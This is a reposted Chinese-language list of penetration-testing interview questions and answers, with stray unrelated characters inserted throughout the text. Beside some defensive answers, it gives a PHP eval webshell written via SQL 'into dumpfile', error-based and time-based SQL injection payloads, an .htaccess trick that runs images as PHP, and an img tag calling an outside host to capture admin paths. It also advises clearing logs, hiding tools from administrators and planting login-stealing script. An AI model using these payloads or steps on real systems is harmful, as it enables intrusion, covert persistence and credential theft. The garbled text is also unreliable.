轉(zhuǎn)載自公眾號：alisrc

1.拿到一個待檢測的站懈词，你覺得應(yīng)該先做什么？

1)信息收集
    1辩诞，獲取域名的whois信息,獲取注冊者郵箱姓名電話等坎弯。
    2，查詢服務(wù)器旁站以及子域名站點译暂，因為主站一般比較難抠忘，所以先看看旁站有沒有通用性的cms或者其他漏洞。
    3外永，查看服務(wù)器操作系統(tǒng)版本崎脉，web中間件，看看是否存在已知的漏洞伯顶，比如IIS囚灼，APACHE,NGINX的解析漏洞
    4，查看IP祭衩，進行IP地址端口掃描灶体，對響應(yīng)的端口進行漏洞探測，比如 rsync,心臟出血掐暮，mysql,ftp,ssh弱口令等蝎抽。
    5，掃描網(wǎng)站目錄結(jié)構(gòu)路克，看看是否可以遍歷目錄樟结，或者敏感文件泄漏，比如php探針
    6精算，google hack 進一步探測網(wǎng)站的信息瓢宦，后臺，敏感文件
2）漏洞掃描
    開始檢測漏洞殖妇，如XSS,XSRF,sql注入刁笙，代碼執(zhí)行，命令執(zhí)行，越權(quán)訪問疲吸，目錄讀取座每，任意文件讀取，下載摘悴，文件包含峭梳，
    遠(yuǎn)程命令執(zhí)行，弱口令蹂喻，上傳葱椭，編輯器漏洞，暴力破解等
3）漏洞利用
    利用以上的方式拿到webshell口四，或者其他權(quán)限
4）權(quán)限提升
    提權(quán)服務(wù)器孵运，比如windows下mysql的udf提權(quán)，serv-u提權(quán)蔓彩，windows低版本的漏洞治笨，如iis6,pr,巴西烤肉，linux臟牛漏洞赤嚼，linux內(nèi)核版本漏洞提權(quán)旷赖，linux下的mysql system提權(quán)以及oracle低權(quán)限提權(quán)
5) 日志清理
6）總結(jié)報告及修復(fù)方案

2.判斷出網(wǎng)站的CMS對滲透有什么意義？

查找網(wǎng)上已曝光的程序漏洞更卒。

如果開源等孵，還能下載相對應(yīng)的源碼進行代碼審計。

3.一個成熟并且相對安全的CMS蹂空，滲透時掃目錄的意義俯萌？

敏感文件、二級目錄掃描

站長的誤操作比如：網(wǎng)站備份的壓縮文件腌闯、說明.txt绳瘟、二級目錄可能存放著其他站點

4.常見的網(wǎng)站服務(wù)器容器雕憔。

IIS姿骏、Apache、nginx斤彼、Lighttpd分瘦、Tomcat

5.mysql注入點，用工具對目標(biāo)站直接寫入一句話琉苇，需要哪些條件嘲玫？

root權(quán)限以及網(wǎng)站的絕對路徑。

6.目前已知哪些版本的容器有解析漏洞并扇，具體舉例去团。

IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夾名

IIS 7.0/7.5
默認(rèn)Fast-CGI開啟，直接在url中圖片地址后面輸入/1.php，會把正常圖片當(dāng)成php解析

Nginx
版本小于等于0.8.37土陪，利用方法和IIS 7.0/7.5一樣昼汗，F(xiàn)ast-CGI關(guān)閉情況下也可利用。
空字節(jié)代碼 xxx.jpg.php

Apache
上傳的文件命名為：test.php.x1.x2.x3鬼雀，Apache是從右往左判斷后綴

lighttpd
xx.jpg/xx.php顷窒，不全,請小伙伴們在評論處不吝補充，謝謝源哩！

7.如何手工快速判斷目標(biāo)站是windows還是linux服務(wù)器鞋吉？

linux大小寫敏感,windows大小寫不敏感。

8.為何一個mysql數(shù)據(jù)庫的站励烦，只有一個80端口開放谓着？

更改了端口，沒有掃描出來坛掠。

站庫分離漆魔。

3306端口不對外開放

9、3389無法連接的幾種情況

沒開放3389 端口

端口被修改

防護攔截

處于內(nèi)網(wǎng)(需進行端口轉(zhuǎn)發(fā))

10.如何突破注入時字符被轉(zhuǎn)義却音？

寬字符注入

hex編碼繞過

11.在某后臺新聞編輯界面看到編輯器改抡，應(yīng)該先做什么？

查看編輯器的名稱版本,然后搜索公開的漏洞系瓢。

12.拿到一個webshell發(fā)現(xiàn)網(wǎng)站根目錄下有.htaccess文件阿纤，我們能做什么？

能做的事情很多夷陋，用隱藏網(wǎng)馬來舉例子：
插入
<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>
.jpg文件會被解析成.php文件欠拾。

具體其他的事情，不好詳說骗绕，建議大家自己去搜索語句來玩玩藐窄。

13.注入漏洞只能查賬號密碼？

只要權(quán)限廣酬土，拖庫脫到老荆忍。

14.安全狗會追蹤變量，從而發(fā)現(xiàn)出是一句話木馬嗎撤缴？

是根據(jù)特征碼刹枉，所以很好繞過了，只要思路寬屈呕，繞狗繞到歡微宝，但這應(yīng)該不會是一成不變的。

15.access 掃出后綴為asp的數(shù)據(jù)庫文件虎眨，訪問亂碼蟋软，如何實現(xiàn)到本地利用镶摘？

迅雷下載，直接改后綴為.mdb岳守。

16.提權(quán)時選擇可讀寫目錄钉稍，為何盡量不用帶空格的目錄？

因為exp執(zhí)行多半需要空格界定參數(shù)

17.某服務(wù)器有站點A,B 為何在A的后臺添加test用戶棺耍，訪問B的后臺贡未。發(fā)現(xiàn)也添加上了test用戶？

同數(shù)據(jù)庫蒙袍。

18.注入時可以不使用and 或or 或xor俊卤，直接order by 開始注入嗎？

and/or/xor害幅，前面的1=1消恍、1=2步驟只是為了判斷是否為注入點，如果已經(jīng)確定是注入點那就可以省那步驟去以现。

19:某個防注入系統(tǒng)狠怨，在注入時會提示：

系統(tǒng)檢測到你有非法注入的行為。
已記錄您的ip xx.xx.xx.xx
時間:2016:01-23
提交頁面:test.asp?id=15
提交內(nèi)容:and 1=1

20、如何利用這個防注入系統(tǒng)拿shell？

在URL里面直接提交一句話传惠，這樣網(wǎng)站就把你的一句話也記錄進數(shù)據(jù)庫文件了 這個時候可以嘗試尋找網(wǎng)站的配置文件 直接上菜刀鏈接。具體文章參見：http://ytxiao.lofter.com/post/40583a_ab36540憎蛤。

21.上傳大馬后訪問亂碼時，有哪些解決辦法纪吮？

瀏覽器中改編碼俩檬。

22.審查上傳點的元素有什么意義？

有些站點的上傳文件類型的限制是在前端實現(xiàn)的碾盟，這時只要增加上傳類型就能突破限制了棚辽。

23.目標(biāo)站禁止注冊用戶，找回密碼處隨便輸入用戶名提示：“此用戶不存在”冰肴，你覺得這里怎樣利用屈藐？

先爆破用戶名，再利用被爆破出來的用戶名爆破密碼嚼沿。

其實有些站點估盘，在登陸處也會這樣提示

所有和數(shù)據(jù)庫有交互的地方都有可能有注入。

24.目標(biāo)站發(fā)現(xiàn)某txt的下載地址為http://www.test.com/down/down.php?file=/upwdown/1.txt骡尽，你有什么思路？

這就是傳說中的下載漏洞擅编！在file=后面嘗試輸入index.php下載他的首頁文件攀细，然后在首頁文件里繼續(xù)查找其他網(wǎng)站的配置文件箫踩，可以找出網(wǎng)站的數(shù)據(jù)庫密碼和數(shù)據(jù)庫的地址。

25.甲給你一個目標(biāo)站谭贪，并且告訴你根目錄下存在/abc/目錄境钟，并且此目錄下存在編輯器和admin目錄。請問你的想法是俭识？

直接在網(wǎng)站二級目錄/abc/下掃描敏感文件及目錄慨削。

26.在有shell的情況下，如何使用xss實現(xiàn)對目標(biāo)站的長久控制套媚？

后臺登錄處加一段記錄登錄賬號密碼的js缚态，并且判斷是否登錄成功，如果登錄成功堤瘤，就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發(fā)到自己的網(wǎng)站文件中玫芦。(此方法適合有價值并且需要深入控制權(quán)限的網(wǎng)絡(luò))。

在登錄后才可以訪問的文件中插入XSS腳本本辐。

27.后臺修改管理員密碼處桥帆，原密碼顯示為*。你覺得該怎樣實現(xiàn)讀出這個用戶的密碼慎皱？

審查元素 把密碼處的password屬性改成text就明文顯示了

28.目標(biāo)站無防護老虫，上傳圖片可以正常訪問，上傳腳本格式訪問則403.什么原因茫多？

原因很多张遭，有可能web服務(wù)器配置把上傳目錄寫死了不執(zhí)行相應(yīng)腳本，嘗試改后綴名繞過

29.審查元素得知網(wǎng)站所使用的防護軟件地梨，你覺得怎樣做到的菊卷？

在敏感操作被攔截，通過界面信息無法具體判斷是什么防護的時候宝剖，F(xiàn)12看HTML體部 比如護衛(wèi)神就可以在名稱那看到<hws>內(nèi)容<hws>洁闰。

30.在win2003服務(wù)器中建立一個 .zhongzi文件夾用意何為？

隱藏文件夾万细，為了不讓管理員發(fā)現(xiàn)你傳上去的工具扑眉。

31、sql注入有以下兩個測試選項赖钞，選一個并且闡述不選另一個的理由：

A. demo.jsp?id=2+1 B. demo.jsp?id=2-1
選B腰素，在 URL 編碼中 + 代表空格，可能會造成混淆

32雪营、以下鏈接存在 sql 注入漏洞弓千，對于這個變形注入，你有什么思路献起？

demo.do?DATA=AjAxNg==
DATA有可能經(jīng)過了 base64 編碼再傳入服務(wù)器洋访，所以我們也要對參數(shù)進行 base64 編碼才能正確完成測試

33镣陕、發(fā)現(xiàn) demo.jsp?uid=110 注入點，你有哪幾種思路獲取 webshell姻政，哪種是優(yōu)選呆抑？

有寫入權(quán)限的，構(gòu)造聯(lián)合查詢語句使用using INTO OUTFILE汁展，可以將查詢的輸出重定向到系統(tǒng)的文件中鹊碍，這樣去寫入 WebShell
使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個 Shell食绿，這樣效率更高
通過構(gòu)造聯(lián)合查詢語句得到網(wǎng)站管理員的賬戶和密碼侈咕，然后掃后臺登錄后臺，再在后臺通過改包上傳等方法上傳 Shell

34炫欺、CSRF 和 XSS 和 XXE 有什么區(qū)別乎完，以及修復(fù)方式？

XSS是跨站腳本攻擊品洛，用戶提交的數(shù)據(jù)中可以構(gòu)造代碼來執(zhí)行树姨，從而實現(xiàn)竊取用戶信息等攻擊。修復(fù)方式：對字符實體進行轉(zhuǎn)義桥状、使用HTTP Only來禁止JavaScript讀取Cookie值帽揪、輸入時校驗、瀏覽器與Web應(yīng)用端采用相同的字符編碼辅斟。

CSRF是跨站請求偽造攻擊转晰，XSS是實現(xiàn)CSRF的諸多手段中的一種，是由于沒有在關(guān)鍵操作執(zhí)行時進行是否由用戶自愿發(fā)起的確認(rèn)士飒。修復(fù)方式：篩選出需要防范CSRF的頁面然后嵌入Token查邢、再次輸入密碼、檢驗Referer
XXE是XML外部實體注入攻擊酵幕，XML中可以通過調(diào)用實體來請求本地或者遠(yuǎn)程內(nèi)容扰藕，和遠(yuǎn)程文件保護類似，會引發(fā)相關(guān)安全問題芳撒，例如敏感文件讀取邓深。修復(fù)方式：XML解析庫在調(diào)用時嚴(yán)格禁止對外部實體的解析。

35笔刹、CSRF芥备、SSRF和重放攻擊有什么區(qū)別？

CSRF是跨站請求偽造攻擊舌菜，由客戶端發(fā)起
SSRF是服務(wù)器端請求偽造萌壳，由服務(wù)器發(fā)起
重放攻擊是將截獲的數(shù)據(jù)包進行重放，達到身份認(rèn)證等目的

36、說出至少三種業(yè)務(wù)邏輯漏洞讶凉，以及修復(fù)方式染乌？

密碼找回漏洞中存在

1）密碼允許暴力破解山孔、

2）存在通用型找回憑證懂讯、

3）可以跳過驗證步驟、

4）找回憑證可以攔包獲取

等方式來通過廠商提供的密碼找回功能來得到密碼台颠。
身份認(rèn)證漏洞中最常見的是

1）會話固定攻擊

2） Cookie 仿冒

只要得到 Session 或 Cookie 即可偽造用戶身份褐望。
驗證碼漏洞中存在

1）驗證碼允許暴力破解

2）驗證碼可以通過 Javascript 或者改包的方法來進行繞過

37、圈出下面會話中可能存在問題的項串前，并標(biāo)注可能會存在的問題瘫里？

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”
HTTP/1.1Host:***.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive

38、給你一個網(wǎng)站你是如何來滲透測試的?
在獲取書面授權(quán)的前提下荡碾。

39谨读、sqlmap，怎么對一個注入點注入坛吁？
1）如果是get型號劳殖，直接，sqlmap -u "諸如點網(wǎng)址".
2) 如果是post型諸如點拨脉，可以sqlmap -u "注入點網(wǎng)址” --data="post的參數(shù)"
3）如果是cookie哆姻，X-Forwarded-For等，可以訪問的時候玫膀，用burpsuite抓包矛缨，注入處用號替換，放到文件里帖旨，然后sqlmap -r "文件地址"

40箕昭、nmap，掃描的幾種方式

41解阅、sql注入的幾種類型落竹？
1）報錯注入
2）bool型注入
3）延時注入
4）寬字節(jié)注入
42、報錯注入的函數(shù)有哪些瓮钥？ 10個
1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------
2）通過floor報錯 向下取整
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10）.exp()select from test where id=1 and exp(~(select * from(select user())a));

43筋量、延時注入如何來判斷？
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

44碉熄、盲注和延時注入的共同點桨武？
都是一個字符一個字符的判斷

45、如何拿一個網(wǎng)站的webshell锈津？
上傳呀酸，后臺編輯模板，sql注入寫文件琼梆，命令執(zhí)行性誉，代碼執(zhí)行窿吩，
一些已經(jīng)爆出的cms漏洞，比如dedecms后臺可以直接建立腳本文件错览，wordpress上傳插件包含腳本文件zip壓縮包等

46纫雁、sql注入寫文件都有哪些函數(shù)？
select '一句話' into outfile '路徑'
select '一句話' into dumpfile '路徑'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47倾哺、如何防止CSRF?
1,驗證referer
2轧邪，驗證token
詳細(xì)：http://cnodejs.org/topic/5533dd6e9138f09b629674fd

48、owasp 漏洞都有哪些羞海？
1忌愚、SQL注入防護方法：
2、失效的身份認(rèn)證和會話管理
3却邓、跨站腳本攻擊XSS
4硕糊、直接引用不安全的對象
5、安全配置錯誤
6腊徙、敏感信息泄露
7简十、缺少功能級的訪問控制
8、跨站請求偽造CSRF
9昧穿、使用含有已知漏洞的組件
10勺远、未驗證的重定向和轉(zhuǎn)發(fā)

49、SQL注入防護方法时鸵？
1胶逢、使用安全的API
2、對輸入的特殊字符進行Escape轉(zhuǎn)義處理
3饰潜、使用白名單來規(guī)范化輸入驗證方法
4初坠、對客戶端輸入進行控制，不允許輸入SQL注入相關(guān)的特殊字符
5彭雾、服務(wù)器端在提交數(shù)據(jù)庫進行SQL查詢之前碟刺，對特殊字符進行過濾、轉(zhuǎn)義薯酝、替換半沽、刪除。

50吴菠、代碼執(zhí)行者填，文件讀取，命令執(zhí)行的函數(shù)都有哪些做葵？

1）代碼執(zhí)行：

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2）文件讀日加础：

file_get_contents(),highlight_file(),fopen(),read

file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3)命令執(zhí)行：

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

51、img標(biāo)簽除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎榨乎？
src指定一個遠(yuǎn)程的腳本文件怎燥，獲取referer

52、img標(biāo)簽除了onerror屬性外蜜暑，并且src屬性的后綴名铐姚，必須以.jpg結(jié)尾，怎么獲取管理員路徑史煎。

1）遠(yuǎn)程服務(wù)器修改apache配置文件谦屑，配置.jpg文件以php方式來解析
AddType application/x-httpd-php .jpg
<img src=http://xss.tv/1.jpg> 會以php方式來解析